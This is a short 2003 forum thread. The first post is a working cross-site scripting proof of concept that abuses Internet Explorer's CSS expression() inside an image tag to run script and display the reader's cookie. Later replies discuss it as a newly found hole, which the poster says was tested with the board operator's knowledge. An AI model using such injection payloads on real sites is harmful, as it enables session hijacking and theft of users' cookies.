| 10-22-2003, 10:02 AM | #1 |
[IMG]" style="color:expression(eval(this.parentElement.getElementsByTagName('b')[0].innerHTML))[/IMG]this.parentElement.style.cssText='background-color:yellow; font-weight:800; font-style:italic; color:black;'; this.parentElement.innerHTML='your cookie: '+document.cookie; |
| 10-22-2003, 10:31 AM | #2 |
Hmm, we knew about this... thought it was fixed... I guess it isnt :) |
| 10-22-2003, 10:35 AM | #3 |
Yeah well, I'm a friend of one of the guys who runs this board so I thought I'd see if it was hackable at all. The java[tab]script: protocol problem was fixed, this is an entirely new one. It seems IE allows for 'expression([javascript])' in CSS stylesheets to make them scriptable. So by injecting an inline stylesheet in an img tag I was able to execute some javascript that reads the cookie :) |